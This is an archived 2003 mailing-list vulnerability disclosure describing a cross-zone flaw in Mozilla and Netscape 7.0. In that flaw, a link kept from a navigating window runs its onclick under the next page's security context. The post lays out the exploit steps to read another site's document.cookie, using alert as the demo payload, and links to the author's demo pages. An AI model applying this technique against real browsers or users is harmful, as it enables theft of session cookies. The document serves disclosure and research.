('binary' encoding is not supported, stored as-is) i cracked restriction of 'zone' in mozilla. ("that's all" is the end of file if you are in a hurry) [tested] OS:"Windows Server 2003" NETSCAPE Ver String: "Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.0.1) Gecko/20020823 Netscape/7.0 " (downloaded on "2003/3/31 UTC+800") MOZILLA Ver String: "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.3) Gecko/20030312" (downloaded on "2003/4/1 UTC+800") MOZILLA Ver String: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4a) Gecko/20030401" (downloaded on "2003/4/15 UTC+800") [demo] http://liudieyuinchina.vip.sina.com/EdgeLink/EdgeLink-MyPage.htm or UMBRELLA.MX.TC ===> EdgeLink-MyPage section. (disable Popup killer.) [exp] Mozilla does not wash links on the edge of transforming from one document to another. {0}before content of the next document is loaded & after the security ID of current document is changed to the security ID of the next one(such period exists.): {1}links including their "onclick" property in current document remain alive(=clickable). {1.1}i can access my link if i have its reference. now,i call its "onclick" via the reference of link: {1.2}"onclick" is executed with security ID of the next page which is going to be loaded. (boring? "[demo-exp]" is easier.) [demo-exp] okay, this is easier. listen up: task: show "document.cookie" at "www.securityfocus.com", via "window.alert". [*]our "LINK" page: it's in our 'zone' and contains a link with onclick="alert(document.cookie)" [*]"main" script lives in another page; now, "main" script plays the trick: open "LINK" page in another window - "mywin". save the reference of the link in "LINK" page to "MyLink" variable. tell "mywin" to go to "http://www.securityfocus.com/". wait until the security ID changes ("security ID changes"<==>"main script is unable to get protected info"-- >"try{[Get protected info in mywin]}catch{[now, security ID is changed.]}" ) call "MyLink.onclick()" *immediately*. /* we call that immediately, so the time is {0}(refer to "{0}" in "[exp]"); even though the security ID is changed to that of "http://www.securityfocus.com", our link remains alive.{1} even though the security ID is victim's id, main script still can call "MyLink.onclick()".{1.1} at last, {1.2} */ that's all. [how] from small beginnings come great things! read: http://liudieyuinchina.vip.sina.com/EdgeLink/EdgeLink-How.htm or UMBRELLA.MX.TC ===> EdgeLink-How section. if you are interested in how i got this in 5 hours after i downloaded mozilla. [people] greetings to you all! and thanx to "the Pull", dror, bin, gean, dross, iainm, and always: mom and dad - for their help. [extra offer] if you are browsing through web daily with MSIE, try: http://liudieyuinchina.vip.sina.com/domex/aPoP or DOMEX.INT.TC ===> aPoP section. (it's coded by me; i hope you like it :-) ) BTW,i'm very proud of my "PuriWeb" function in it. ----- all mentioned resources can always be found at UMBRELLA.MX.TC [contact] UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"
This archive was generated by hypermail 2b30 : Wed Apr 16 2003 - 06:13:29 PDT